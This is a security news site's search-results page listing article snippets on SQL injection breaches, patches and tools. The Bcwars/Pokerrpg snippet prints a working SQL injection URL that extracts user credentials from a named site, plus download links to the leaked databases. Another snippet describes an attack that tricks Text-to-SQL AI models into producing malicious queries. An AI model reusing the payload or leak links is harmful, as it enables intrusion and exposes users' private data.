#1 Trusted Cybersecurity News Platform Followed by 4.50+ million
The Hacker News Logo
Subscribe – Get Latest News
Insider Risk Management

Search results for SQL Injection | Breaking Cybersecurity News | The Hacker News

Metasploit Framework v3.5.2 latest version download !

Metasploit Framework v3.5.2 latest version download !

Feb 11, 2011
Our favourite exploitation framework – The Metasploit Framework has been updated! We now have Metasploit Framework version 3.5.2! "The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool. The framework includes hundreds of working remote exploits for a variety of platforms. Payloads, encoders, and nop slide generators can be mixed and matched with exploit modules to solve almost any exploit-related task." This is the detailed release log: Statistics: * Metasploit now ships with 644 exploit modules and 330 auxiliary modules. * 39 new modules and payloads have been added since the last point release. * 58 tickets were resolved and 331 commits were made since the last point release. New Modules: New Exploits and Auxiliaries: * Apache Tomcat Transfer-Encoding Information Disclosure and DoS * Microsoft IIS FTP Server Encoded Response Overflow Trigger * Apache HTTPD mod_negotiation Filename Bruter * Apache HTTPD mod_negotiatio
New Nagios Software Bugs Could Let Hackers Take Over IT Infrastructures

New Nagios Software Bugs Could Let Hackers Take Over IT Infrastructures

Sep 22, 2021
As many as 11 security vulnerabilities have been disclosed in Nagios network management systems, some of which could be chained to achieve pre-authenticated remote code execution with the highest privileges, as well as lead to credential theft and phishing attacks.  Industrial cybersecurity firm Claroty, which discovered the flaws, said flaws in tools such as Nagios make them an attractive target owing to their "oversight of core servers, devices, and other critical components in the enterprise network." The issues have since been fixed in updates released in August with Nagios XI 5.8.5 or above, Nagios XI Switch Wizard 2.5.7 or above, Nagios XI Docker Wizard 1.13 or above, and Nagios XI WatchGuard 1.4.8 or above. " SolarWinds  and  Kaseya  were likely targeted not only because of their large and influential customer bases, but also because of their respective technologies' access to enterprise networks, whether it was managing IT, operational technology (OT), or
Navigating the Threat Landscape: Understanding Exposure Management, Pentesting, Red Teaming and RBVM

Navigating the Threat Landscape: Understanding Exposure Management, Pentesting, Red Teaming and RBVM

Apr 29, 2024Exposure Management / Attack Surface
It comes as no surprise that today's cyber threats are orders of magnitude more complex than those of the past. And the ever-evolving tactics that attackers use demand the adoption of better, more holistic and consolidated ways to meet this non-stop challenge. Security teams constantly look for ways to reduce risk while improving security posture, but many approaches offer piecemeal solutions – zeroing in on one particular element of the evolving threat landscape challenge – missing the forest for the trees.  In the last few years, Exposure Management has become known as a comprehensive way of reigning in the chaos, giving organizations a true fighting chance to reduce risk and improve posture. In this article I'll cover what Exposure Management is, how it stacks up against some alternative approaches and why building an Exposure Management program should be on  your 2024 to-do list. What is Exposure Management?  Exposure Management is the systematic identification, evaluation,
Sony Pictures hacked and Database Leaked by LulzSec

Sony Pictures hacked and Database Leaked by LulzSec

Jun 02, 2011
Sony Pictures hacked and Database Leaked by LulzSec YES ! Sony Hacked Again once more by Lulzsec. The Target is  SonyPictures.com and It compromised over 1,000,000 users'personal information, including passwords, email addresses, home addresses,dates of birth, and all Sony opt-in data associated with their accounts.Also compromised all admin details of Sony Pictures(including passwords) along with 75,000 "music codes" and 3.5 million "music coupons". SonyPictures.com was hacked by a very simple SQL injection , one of the most primitive and common vulnerabilities.From a single injection, They accessed whole database.  The worst thing is Sony stored over 1,000,000 passwords of its customers in plaintext, No md5 OR other type of Encryption. The Leaked Data included databases from Sony BMG Belgium & Netherlands .These also contain varied assortments of Sony user and staffer information. Message By Lulzsec: Our goal here is not to come across as m
cyber security

SaaS Security Buyers Guide

websiteAppOmniSaaS Security / Threat Detection
This guide captures the definitive criteria for choosing the right SaaS Security Posture Management (SSPM) vendor.
Bug or Feature? Hidden Web Application Vulnerabilities Uncovered

Bug or Feature? Hidden Web Application Vulnerabilities Uncovered

Dec 15, 2023 Web App Security / Secure Coding
Web Application Security consists of a myriad of security controls that ensure that a web application: Functions as expected. Cannot be exploited to operate out of bounds. Cannot initiate operations that it is not supposed to do. Web Applications have become ubiquitous after the expansion of Web 2.0, which Social Media Platforms, E-Commerce websites, and email clients saturating the internet spaces in recent years.  As the applications consume and store even more sensitive and comprehensive data, they become an ever more appealing target for attackers.  Common Attack Methods The three most common vulnerabilities that exist in this space are Injections (SQL, Remote Code), Cryptographic Failures (previously sensitive data exposure), and Broken Access Control (BAC). Today, we will focus on Injections and Broken Access Control.  Injections  SQL is the most common Database software that is used, and hosts a plethora of payment data, PII data, and internal business records. A SQ
QNAP Fixes Critical Vulnerability in NAS Devices with Latest Security Updates

QNAP Fixes Critical Vulnerability in NAS Devices with Latest Security Updates

Jan 31, 2023 Data Security / Vulnerability
Taiwanese company QNAP has released updates to remediate a critical security flaw affecting its network-attached storage (NAS) devices that could lead to arbitrary code injection. Tracked as  CVE-2022-27596 , the vulnerability is rated 9.8 out of a maximum of 10 on the CVSS scoring scale. It affects QTS 5.0.1 and QuTS hero h5.0.1. "If exploited, this vulnerability allows remote attackers to inject malicious code," QNAP  said  in an advisory released Monday. The exact technical specifics surrounding the flaw are unclear, but the NIST National Vulnerability Database (NVD) has categorized it as an SQL injection vulnerability. This means an attacker could send specially crafted SQL queries such that they could be weaponized to bypass security controls and access or alter valuable information. "Just as it may be possible to read sensitive information, it is also possible to make changes or even delete this information with a SQL injection attack," according to  MI
New Study Uncovers Text-to-SQL Model Vulnerabilities Allowing Data Theft and DoS Attacks

New Study Uncovers Text-to-SQL Model Vulnerabilities Allowing Data Theft and DoS Attacks

Jan 09, 2023 Database Security / PLM Framework
A group of academics has demonstrated novel attacks that leverage Text-to-SQL models to produce malicious code that could enable adversaries to glean sensitive information and stage denial-of-service (DoS) attacks. "To better interact with users, a wide range of database applications employ AI techniques that can translate human questions into SQL queries (namely  Text-to-SQL ),"  Xutan Peng , a researcher at the University of Sheffield, told The Hacker News. "We found that by asking some specially designed questions, crackers can fool Text-to-SQL models to produce malicious code. As such code is automatically executed on the database, the consequence can be pretty severe (e.g., data breaches and DoS attacks)." The  findings , which were validated against two commercial solutions  BAIDU-UNIT  and  AI2sql , mark the first empirical instance where natural language processing (NLP) models have been exploited as an attack vector in the wild. The black box attacks a
University of Washington Vulnerable and Database Leaked by Hacker

University of Washington Vulnerable and Database Leaked by Hacker

Feb 07, 2012
University of Washington Vulnerable and Database Leaked by Hacker A few days back, a Team INTRA member hacked into the University of Washington database and released much data. Today, N0B0DY and N0LIFE hacked into it again, releasing the most recent passwords on  Pastebin . The root MySQL password was also released, as well as many other MySQL users. The information_schema database was accessed, and they released the COLUMNS table completely, having 6363 records. Hackers also expose the vulnerable links in Pastebin note. University of Washington is a public research university, founded in 1861 in Seattle, Washington, United States. The UW is the largest university in the Northwest and the oldest public university on the West Coast. The exposed vulnerabilities are of SQL injection. It is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database. Attackers take advantage of the fact
Atlassian Releases Fixes for Over 2 Dozen Flaws, Including Critical Bamboo Bug

Atlassian Releases Fixes for Over 2 Dozen Flaws, Including Critical Bamboo Bug

Mar 21, 2024 Database / Vulnerability
Atlassian has released patches for  more than two dozen security flaws , including a critical bug impacting Bamboo Data Center and Server that could be exploited without requiring user interaction. Tracked as  CVE-2024-1597 , the vulnerability carries a CVSS score of 10.0, indicating maximum severity. Described as an SQL injection flaw, it's rooted in a dependency called org.postgresql:postgresql, as a result of which the company said it "presents a lower assessed risk" despite the criticality. "This org.postgresql:postgresql dependency vulnerability [...] could allow an unauthenticated attacker to expose assets in your environment susceptible to exploitation which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires no user interaction," Atlassian  said . According to a  description  of the flaw in the NIST's National Vulnerability Database (NVD), "pgjdbc, the PostgreSQL JDBC Driver, allows attac
EC-Council News : Advanced Security Training First Look !

EC-Council News : Advanced Security Training First Look !

Mar 22, 2011
EC-Council News : Advanced Security Training First Look ! Information technology continues to rapidly evolve and as the dependence on Internet technology increases, so are the risks to information systems.  As such, information security professionals are required to stay up-to-date on the latest security technologies, threats and remediation strategies. EC-Council's  Center of Advanced Security Training (CAST)  was created to address the need for highly technical and advanced security training for information security professionals. CAST First Look Training Series As part of the launch of CAST, we are pleased to present a First Look training series that will give an insight into the following programs, where we invite the authors of the respective courses to conduct a "LIVE" online training on a selected module from the program. Advanced Penetration Testing (CAST 611) A highly technical and intensive course that focuses attacking and defending highly secured envir
PBS (Public Broadcasting Service) & Writerspace Hacked Again by Warv0x (AKA Kaihoe)

PBS (Public Broadcasting Service) & Writerspace Hacked Again by Warv0x (AKA Kaihoe)

Jun 24, 2011
PBS (Public Broadcasting Service) & Writerspace Hacked Again by Warv0x (AKA Kaihoe) Yes ! Its True that  PBS (Public Broadcasting Service) Hacked once again .Last time, A month before Public Broadcasting Service (PBS) Hacked by Lulzsec and Users data ,Database was Leaked and then Lulzsec claim that PSB.org was hacked with 0day exploit for MoveableType . This time  Warv0x (AKA Kaihoe) expose the whole Database of  PBS.org  using SQL injection. According to Warv0x (AKA Kaihoe) " This wasn't done for fame or fun,just proving LulzSec aren't as goodas they think they are. I haven't rooted the box or been up to crack the hashes, I'm just proving that most of their attacks are very lame and basic (i'm pretty sure and automated) SQL injections and further privilege escalation, which is just matter of time. " He also said " Support for WebNinjas & Jester, good job at exposing them.Sad to mention, but I really agree with th3j35t3r & WebNin
Forbes.com Vulnerable to XSS injection

Forbes.com Vulnerable to XSS injection

Aug 05, 2011
Forbes.com Vulnerable to XSS injection One of the Leading News Company Forbes is Vulnerable. Hacker with name " B1uB3rry " expose that Forbes.com is vulnerable to possible SQL injection but confirmed to be vulnerable to Cross Site Script Injection (XSS) & HTML Injection. According to hacker " One can easily deface the website as other vulnerabilities exist. "  Live Example of XSS injection on Forbes  . Hacker is Admin of  B1uB3rry Security Team (San Antonio, TX). Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users. UPDATE: Another XSS on Subdomain of Forbes . This Vulnerability also exposed by a hacker on Twitter .
Several Bugs Found in 3 Open-Source Software Used by Several Businesses

Several Bugs Found in 3 Open-Source Software Used by Several Businesses

Jul 27, 2021
Cybersecurity researchers on Tuesday disclosed nine security vulnerabilities affecting three open-source projects —  EspoCRM ,  Pimcore , and  Akaunting  — that are widely used by several small to medium businesses and, if successfully exploited, could provide a pathway to more sophisticated attacks. All the security flaws in question, which impact EspoCRM v6.1.6, Pimcore Customer Data Framework v3.0.0, Pimcore AdminBundle v6.8.0, and Akaunting v2.1.12, were fixed within a day of responsible disclosure, researchers Wiktor SÄ™dkowski of Nokia and Trevor Christiansen of Rapid7  noted. Six of the nine flaws were uncovered in the Akaunting project. EspoCRM is an open-source customer relationship management (CRM) application, while Pimcore is an open-source enterprise software platform for customer data management, digital asset management, content management, and digital commerce. Akaunting, on the other hand, is an open-source and online accounting software designed for invoice and exp
Ubuntu Linux Forum Hacked! Once Again

Ubuntu Linux Forum Hacked! Once Again

Jul 15, 2016
No software is immune to being Hacked! Not even Linux. The Ubuntu online forums have been hacked, and data belonging to over 2 Million users have been compromised, Canonical just announced. The compromised users' data include their IP addresses, usernames, and email addresses, according to the company, who failed to apply a patch to secure its users' data. However, users should keep in mind that the hack did not affect the Ubuntu operating system, or it was not due to a vulnerability or weakness in the OS. Instead, the breach only affected the Ubuntu online forums that people use to discuss the OS, said BetaNews, who initially reported the news. "There has been a security breach on the Ubuntu Forums site," Jane Silber, Chief Executive Officer at Canonical wrote in a blog post . "We take information security and user privacy very seriously, follow a strict set of security practices and this incident has triggered a thorough investigation." "C
Bcwars.com & Pokerrpg.com hacked 200k Email and Plain text passwords !

Bcwars.com & Pokerrpg.com hacked 200k Email and Plain text passwords !

Mar 31, 2011
Bcwars.com & Pokerrpg.com hacked 200k Email and Plain text passwords ! Bcwars.com & Pokerrpg.com hacked 200k Email, also admin used plain text passwords. Used Sql Injection :  https://bcwars.com/forum/category/-3' union select concat(id,'::::',username,':::::::',password,':::::::',email) from tblUsers-- - Bcwars Database :  https://bit.ly/hD6bEE https://rapidshare.com/files/455184098/tblUsers-bc.sql.zip https://www.megaupload.com/?d=P4B30IVR https://depositfiles.com/de/files/u7unbc4vk https://hotfile.com/dl/112676282/bcd44f5/tblUsers-bc.sql.zip.html https://www.zshare.net/download/884416713e3e2044/ https://uploading.com/files/3e13f3be/tblUsers-bc.sql.zip/ Pokerrpg Database :  https://bit.ly/hgCGJx https://rapidshare.com/files/455184096/tblUsers.sql-poker.zip https://www.megaupload.com/?d=T41NF4SV https://depositfiles.com/de/files/8qgnt9gll https://hotfile.com/dl/112676281/bea47ec/tblUsers.sql-poker.zip.html https://www.zshare.net/downloa
Cybersecurity
Expert Insights
Cybersecurity Resources